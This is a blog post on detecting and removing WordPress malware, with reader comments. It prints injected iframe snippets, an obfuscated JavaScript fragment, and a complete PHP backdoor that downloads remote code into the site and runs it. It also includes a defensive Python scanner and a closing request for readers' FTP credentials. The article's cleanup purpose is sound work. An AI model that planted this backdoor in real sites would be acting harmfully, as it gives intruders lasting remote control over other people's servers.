Gîrmacea blog

WordPress Virus and how to remove it

I have seen many types of viruses infecting WordPress blogs. You can check if your WordPress is infected by right-clicking your blog homepage and selecting View Source. Start looking for the following types of code.

Iframe virus

<iframe src="http://virus-site" width="320" height="240"></iframe>

Usually inserted at the end of your source code, after the closing </html> tag.

Search the source code for <iframe; in most cases your theme won’t have any IFRAME except the virus.

Encoded Javascript virus

Search for <script in your code and look for a lot of numbers. These are encoded characters that basically tell the browser to link or redirect to another website.

PHP Virus

<?php echo '<iframe src="http://virus-site...'; ?>

This can be found in the index.php files of your website.

Removing the virus

  1. Change your FTP password immediately!
  2. Search for the above codes in all your index.php files on your site (/index.php , /wp-admin/index.php , /wp-content/themes/[theme-name]/index.php etc.)
  3. Remove the virus lines of code
  4. Look for files that aren’t supposed to be in the WordPress structure. Example: /wp-content/upd.php and /wp-content/1012312asdasdsadas12321.php. A file like this lets the hacker infect your website easily any time he wants, just by accessing a specific URL of your blog. Here is the content of the file:
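    <?php
    // Both values are read straight from the URL query string
    $file = $_GET['file'];
    $pass = $_GET['pass'];
    $true = '92cc227532d17e56e07902b254dfad10';
    if ($pass == $true) {
        // Download whatever the URL in ?file= points to
        $ch = curl_init($file);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $shell = curl_exec($ch);
        curl_close($ch);
        // Save the download as a new .php file with a 32-character hex name
        $tmp = md5(rand(0,10000));
        $f = fopen($tmp.'.php',"w");
        fputs($f,$shell);
        fclose($f);
        // Redirect the visitor to the file that was just written
        header("Location: $tmp.php");
    }
    ?>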
  5. Check /wp-includes/js/jquery/jquery.js and all the other .js files. At the end of the file there might be something like:

    var _0x473c=["\x6E\x20\x71\x28\x29\x7B\x33\x3D\x30\x2E
    \x62\x28\x27\x64\x27\x29\x3B\x33\x2E\x63\x3D\x27\x70\x3A\x2F\x2F\
    ...
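
A defender-side sweep for steps 2 to 5 above, written in Python as an added example that is not part of the original post. The rule names, the `WP_CONTENT_ALLOWED` list and the sample files in `demo()` are constructed assumptions modelled on the snippets shown here; every hit is a pointer for manual review, not proof of infection.

```python
import re
import tempfile
from pathlib import Path

# Heuristics modelled on the samples in this post; hits need manual review.
RULES = {
    "iframe": re.compile(r"<iframe\b", re.I),
    "php-echo-iframe": re.compile(r"echo\s*['\"]\s*<iframe", re.I),
    "remote-dropper": re.compile(r"curl_exec\s*\(.*?fopen\s*\([^)]*\.php", re.I | re.S),
    "hex-encoded-js": re.compile(r"(?:\\x[0-9A-Fa-f]{2}){8,}"),
}
SCAN_EXT = {".php", ".js", ".html", ".htm"}
# Assumption: a stock wp-content/ holds only index.php at its top level.
# Legitimate plugin drop-ins placed there will also be listed for review.
WP_CONTENT_ALLOWED = {"index.php"}

def scan_text(text):
    """Return the sorted names of the rules that match one file's content."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_tree(root):
    """Walk a WordPress directory and map relative path -> findings."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXT:
            continue
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        # Step 4: PHP files sitting directly in wp-content/ that are not stock.
        if (path.parent == Path(root, "wp-content") and path.suffix.lower() == ".php"
                and path.name not in WP_CONTENT_ALLOWED):
            hits.append("unexpected-file")
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Scan a constructed sample site (files built inline) in a temp directory."""
    samples = {
        "index.php": "<?php echo '<iframe src=\"http://virus-site\"></iframe>'; ?>",
        "wp-content/index.php": "<?php // Silence is golden.",
        "wp-content/upd.php": "<?php $s = curl_exec($ch); $f = fopen($tmp.'.php', 'w'); ?>",
        "wp-includes/js/jquery/jquery.js": 'var _0x473c=["\\x6E\\x20\\x71\\x28\\x29\\x7B\\x33\\x3D"];',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)
```

Run `scan_tree()` against a downloaded copy of the site rather than the live server, and compare anything it lists with a fresh WordPress download before deleting it.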
    

I can help you remove the virus for free

If you have a personal blog and you think you have a virus, I can help you remove it for a link, beer or just a simple thank you.

6 responses to “WordPress Virus and how to remove it”

  1. David Pope says:

    Trying to complete my website, when I do a Google search to check if my website is indexed “www.onlinesafety-training.com” 5 results show up, when I scroll down and click the show omitted results a few extra pages show up including http://www.onlinesafety-training.com/wp-includes/js/jquer...
    Can you tell me if this is a virus, and how I could fix it, please?

  2. Marian Tatar says:

    Very useful article :) and it's great that you help people! My congratulations!

  3. John Voce says:

    Hi.
    I have a number of sites on a VPS.

    They are resetting to ‘My CMS’ (Site Name) regularly!!

    As a result I lose ‘multisite’ installs, as the config file removes the multisite permission codes.

    Do you know if this is a virus, please?

    Your help is much appreciated.

    Regards

    John Voce. UK.

  4. Hi Girmacea,

    I need your help to remove a virus sir. You get a thank you, a link, a beer (is there an online beersupplydealer in Romania? Warning: Cannot modify header information – headers already sent by (output started at /home2/mostafa/public_html/meesterversierder.nl/index.php:6) in /home2/mostafa/public_html/meesterversierder.nl/wp-includes/pluggable.php on line 896

    It’s probably just some stupid JavaScript code.

    Isn’t that super?

    Cheers,

    Pim

  5. Lucas says:

    Dear Gîrmacea, thanks for sharing. Do you have any idea how someone can hack the javascript files resting on our servers? Does he have to gain access by some infected plugin or is there another way?


Razvan Girmacea
For faster blog fixing, I may require your FTP data.